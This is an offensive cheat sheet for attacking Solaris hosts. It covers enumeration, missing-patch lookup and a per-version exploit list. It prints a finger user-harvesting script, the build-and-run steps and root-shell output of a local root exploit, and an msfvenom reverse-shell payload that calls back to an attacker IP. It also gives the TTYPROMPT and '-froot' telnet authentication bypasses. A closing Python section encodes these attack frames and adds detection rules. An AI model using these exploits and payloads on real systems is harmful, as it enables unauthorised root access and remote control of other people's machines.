Solaris
Information gathering and exploitation
Enumeration
View patches:
showrev -p
Installed packages:
pkginfo (or pkginfo -x for the condensed abbreviation/name/version listing)
Host information:
uname -a
Show IP interfaces:
ifconfig -a
Process list (BSD-style ps, prints full command lines):
/usr/ucb/ps -auxww
Note that Solaris commands are case-sensitive: Pkginfo and Ifconfig will not be found.
Patch Check Advanced (PCA)
http://www.par.univie.ac.at/solaris/pca/
Patch Check Advanced (PCA) generates lists of installed and missing patches for Oracle Solaris systems and optionally downloads patches. It resolves dependencies between patches and installs them in the correct order. It can be the only tool you ever need for patch management, be it on a single machine or a complete network. It is a single Perl script: it needs neither compilation nor installation, and it does not need root permissions to run. It works on all versions of Solaris, both SPARC and x86.
Usage (offline, against output collected from the target):
./pca.pl -f . -l missing
This produces a list of missing patches. The '.' is the directory PCA reads the saved command output from, so make sure the three files it needs (the saved output of uname -a, showrev -p and pkginfo -l from the target) are in the same directory. Missing patches map directly onto the per-version exploit list below.
Common Solaris Vulnerabilities
Solaris 7
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon (in.lpd) arbitrary file write, turned into command execution through sendmail - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
Solaris 8
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon (in.lpd) arbitrary file write, turned into command execution through sendmail - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
Solaris 9
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function.
kcms_readfile kcms / ttdbserverd remote file read (only in msf2)
Solaris 10
fuser TELNET - authentication bypass through -f command - can be manually exploited
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root.
Solaris 11
fuser TELNET - authentication bypass through -f command - can be manually exploited
Exploits
Solaris 8 finger (user enumeration)
finger '1 2 3 4 5 6 7 8 9 0'@target
A query made of several space-separated names makes the Solaris in.fingerd list every account on the target instead of answering "no such user". The harvested logins are exactly what the ttyprompt and fuser telnet attacks below need as a username.
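The exchange behind that one-liner, as an added example that is not part of the original page: a finger client that sends the multi-name query (RFC 1288: query, CRLF, read until the server closes) and a parser that pulls the login column out of the reply. The host argument is an assumption, and the sample reply is constructed to show the column layout, not captured from a real Solaris host.

```python
"""Solaris in.fingerd user enumeration (added example, not from the page)."""
import socket

MULTI_NAME_QUERY = "1 2 3 4 5 6 7 8 9 0"   # several names in one query = list all accounts

# Constructed sample of what an old Solaris in.fingerd returns (layout only, not a capture).
SAMPLE_REPLY = """\
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 12 10:01>
daemon          ???                         < .  .  .  . >
bin             ???                         < .  .  .  . >
oracle   Oracle user           pts/2           3 Mon 09:14  10.0.0.5
"""


def finger_query(host: str, query: str = MULTI_NAME_QUERY,
                 port: int = 79, timeout: float = 5.0) -> str:
    """One-shot finger exchange: connect to TCP/79, send query + CRLF, read until close."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def parse_logins(reply: str) -> list:
    """First column of every non-empty, non-header line, de-duplicated in order."""
    logins = []
    for line in reply.splitlines():
        if not line.strip() or line.lstrip().startswith("Login"):
            continue
        name = line.split()[0]
        if name not in logins:
            logins.append(name)
    return logins


if __name__ == "__main__":
    import sys
    # With a target argument the query goes over the network; without one the
    # constructed sample is parsed so the script runs offline.
    reply = finger_query(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REPLY
    print(parse_logins(reply))
```

Run it as `python3 finger_enum.py target` against a lab host; the printed list is the username wordlist for the telnet attacks.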
Solaris exploits
https://github.com/0xdea/exploits
raptor_passwd (passwd circ() local root, Solaris/SPARC 8/9)
$ gcc raptor_passwd.c -o passwd -ldl -Wall
$ ./passwd p@ssw0rd
The binary is built as ./passwd, and the argument is the current user's password, which the exploit needs to get past the passwd(1) prompt. Sample run:
raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
Copyright (c) 2004 Marco Ivaldi <[email protected]>
Using SI_PLATFORM : SUNW,UltraAX-i2 (5.9)
Using stack base : 0xffbffffc
Using var address : 0xffbffb58
Using rwx_mem address : 0xff3f6004
Using sc address : 0xffbfff9c
Using ff address : 0xffbfff58
Using strcpy() address : 0xff3e0288
"Pai Mei taught you the five point palm exploding heart technique?" -- Bill
"Of course." -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)
# id;uname -a;uptime;
uid=0(root) gid=9610(gengrp) egid=3(sys)
SunOS wks1 5.9 Generic sun4u sparc SUNW,UltraAX-i2
1:53pm up 1 day(s), 16:32, 1 user, load average: 0.00, 0.00, 0.01
#
Msfvenom payload
msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
TTYPROMPT exploit
Solaris TTYPROMPT Security Vulnerability (Telnet)
This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The attacker only has to define the environment variable TTYPROMPT to a 6-character string inside the telnet client before connecting. Jonathan believes this overflows an integer inside login which records whether the user has been authenticated (just a guess).
Once connected to the remote host, type the username followed by 64 " c" sequences (a space and the letter c, repeated 64 times) and a literal "\n". You will then be logged in as that user without any password authentication. This should work with any account except root (unless remote root login is allowed in /etc/default/login).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
Metasploit:
Solaris in.telnetd TTYPROMPT Buffer Overflow
msf > use exploit/solaris/telnet/ttyprompt
Telnet exploit (fuser)
Exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11 (CVE-2007-0882): the username supplied by the client is passed to login(1) unchecked, so a value of the form -f<user> is read as login's "already authenticated" flag and no password is asked for.
Command line:
telnet -l "-fbin" target_address
Or also
telnet -l "-froot" 192.168.0.1
The -froot variant only works when remote root login is permitted (the CONSOLE line in /etc/default/login commented out); otherwise land as an unprivileged account such as bin and escalate locally.
Metasploit:
msf > use exploit/solaris/telnet/fuser
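Both telnet attacks on this page (ttyprompt and fuser) travel in the same place: the NEW-ENVIRON subnegotiation (RFC 1572) with which the telnet client hands its environment to in.telnetd. The following is an added example, not code from the page or from the Metasploit modules: build_is_reply() produces the client-side frame that `telnet -l "-fbin"` and `environ define TTYPROMPT abcdef` send, parse_is_reply() decodes it on the server or sensor side, and flag_env() applies the two detection rules a network sensor or in.telnetd wrapper would use. The frames in the demo are constructed, not captured.

```python
"""Telnet NEW-ENVIRON (RFC 1572) encoder, decoder and detection rules for the
Solaris ttyprompt (CVE-2001-0797) and fuser (CVE-2007-0882) telnet attacks.
Added example, not part of the original page."""

IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39
IS = 0                             # reply type; the server asks with SEND (1)
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3
_SPECIAL = (VAR, VALUE, ESC, USERVAR)


def _escape(data: bytes) -> bytes:
    """RFC 1572 escaping: VAR/VALUE/ESC/USERVAR inside data get an ESC, IAC is doubled."""
    out = bytearray()
    for b in data:
        if b in _SPECIAL:
            out.append(ESC)
        elif b == IAC:
            out.append(IAC)
        out.append(b)
    return bytes(out)


def build_is_reply(env: dict, uservars=()) -> bytes:
    """Client -> server: IAC SB NEW-ENVIRON IS [VAR|USERVAR name VALUE value]* IAC SE.
    Names listed in `uservars` go out as USERVAR (what `environ define` does for
    non-standard names such as TTYPROMPT); everything else as VAR."""
    frame = bytearray([IAC, SB, NEW_ENVIRON, IS])
    for name, value in env.items():
        frame.append(USERVAR if name in uservars else VAR)
        frame += _escape(name.encode("latin-1"))
        frame.append(VALUE)
        frame += _escape(value.encode("latin-1"))
    frame += bytes([IAC, SE])
    return bytes(frame)


def parse_is_reply(frame: bytes) -> dict:
    """Server/sensor side: decode an IS reply into {name: value}, undoing the escaping."""
    if frame[:4] != bytes([IAC, SB, NEW_ENVIRON, IS]) or frame[-2:] != bytes([IAC, SE]):
        raise ValueError("not a NEW-ENVIRON IS subnegotiation")
    payload = frame[4:-2]
    env, name, value, cur = {}, None, None, None
    i = 0
    while i < len(payload):
        b = payload[i]
        if b in (ESC, IAC):            # escaped data byte follows
            i += 1
            if i >= len(payload) or cur is None:
                raise ValueError("dangling escape")
            cur.append(payload[i])
        elif b in (VAR, USERVAR):      # start of a new variable name
            if name is not None:
                env[name.decode("latin-1")] = (value or bytearray()).decode("latin-1")
            name, value = bytearray(), None
            cur = name
        elif b == VALUE:               # switch from name to value
            if name is None:
                raise ValueError("VALUE before VAR")
            value = bytearray()
            cur = value
        else:
            if cur is None:
                raise ValueError("data before VAR")
            cur.append(b)
        i += 1
    if name is not None:
        env[name.decode("latin-1")] = (value or bytearray()).decode("latin-1")
    return env


def flag_env(env: dict) -> list:
    """Detection rules; returns one finding string per matched attack pattern."""
    findings = []
    user = env.get("USER", "")
    if user.startswith("-"):           # no real login name starts with '-'
        findings.append(f"USER={user!r}: option injected into login(1); "
                        "-f skips password authentication (CVE-2007-0882)")
    ttyprompt = env.get("TTYPROMPT")
    if ttyprompt is not None:          # a remote client has no business exporting this
        findings.append(f"TTYPROMPT={ttyprompt!r} ({len(ttyprompt)} chars): "
                        "login(1) TTYPROMPT overflow trigger (CVE-2001-0797)")
    return findings


if __name__ == "__main__":
    # Constructed frames mirroring the two command lines on the page; not captures.
    fuser = build_is_reply({"USER": "-fbin", "TERM": "vt100"})
    ttyp = build_is_reply({"USER": "bin", "TTYPROMPT": "abcdef"}, uservars=("TTYPROMPT",))
    for frame in (fuser, ttyp):
        print(frame.hex(" "))
        for finding in flag_env(parse_is_reply(frame)):
            print("  !", finding)
```

The hex dump is what a pcap of the attacker's first packets after option negotiation looks like; a simple content match on `ff fa 27 00 00 "USER" 01 "-"` or on the string TTYPROMPT inside a NEW-ENVIRON subnegotiation catches both attacks on the wire.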